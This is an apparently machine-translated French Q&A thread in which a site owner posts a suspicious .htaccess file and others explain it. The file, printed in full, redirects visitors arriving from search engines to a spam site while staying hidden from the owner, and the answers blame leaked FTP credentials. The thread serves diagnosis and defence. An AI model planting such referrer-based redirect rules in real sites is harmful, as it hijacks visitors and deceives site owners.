Fichier .htaccess suspect

20

Cela a été téléchargé dans l'un de mes dossiers FTP. Je ne suis pas familier avec Apache, mais toujours curieux - quelqu'un peut-il me dire quel type d'acte ignoble ce fichier essaie de commettre? Merci!

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
apache-2.2 security mod-rewrite .htaccess ovinophile
la source
1
AGRÉABLE! (D'une manière maléfique ...) Prend fondamentalement tous ceux qui viennent sur votre site à partir d'un moteur de recherche et les redirige vers SPAMMER.info
KPWINC
Si cela m'était arrivé une fois. Le .htaccessfichier ajouté à mon site avait environ 40 lignes vides en haut, juste pour me confondre davantage.
TRiG

Réponses:

15

Cela envoie les utilisateurs provenant d'un moteur de recherche au dernier site SPAMMER.info (voir l'historique des questions pour le site réel ).

Il recherche des référents dans une tentative de vous cacher , car vous n'accédez probablement pas au site via les moteurs de recherche. Autrement dit, si vous accédez directement à l'URL, tout semble normal. Cependant, si vous entrez via un moteur de recherche, vous êtes redirigé.

Remarque: cela n'affecte pas les robots d'indexation car ils ( googlebot, au moins ) ne définissent pas l'en-tête du référent.

Michael Haren
la source
8

Chaque fois qu'un utilisateur d'un moteur de recherche sur une page de votre site, il sera redirigé vers le site de spam .info.

C'est très sournois - vous ne remarquerez rien de mal car vous devrez normalement taper l'adresse.

Greg
la source
1
Puisqu'il regarde le référent, ne redirigera-t-il pas les clics provenant d'un moteur de recherche?
Cela n'affecte-t-il pas également les liens de Google? Par exemple, vous recherchez le site du PO sur Google, cliquez dessus et vous êtes redirigé depuis que vous venez de Google?
Oui, les liens des moteurs de recherche uniquement (comme je l'ai dit dans ma réponse) mais pas les robots / robots des moteurs de recherche. Cette réponse a été mise à jour, elle est donc désormais correcte. Il a indiqué à l'origine que cela ne s'appliquait qu'aux robots.
Michael Haren
1

pour ajouter plus - très probablement vos informations d'identification ftp ont été divulguées. Peut-être les avez-vous enregistrés dans Filezilla / Total Commander, etc.

pQd
la source
Je suis confronté à ce problème. Le jour après que l'autre fichier .htaccess soit modifié, ce qui entraîne une erreur interne du serveur.
vnix27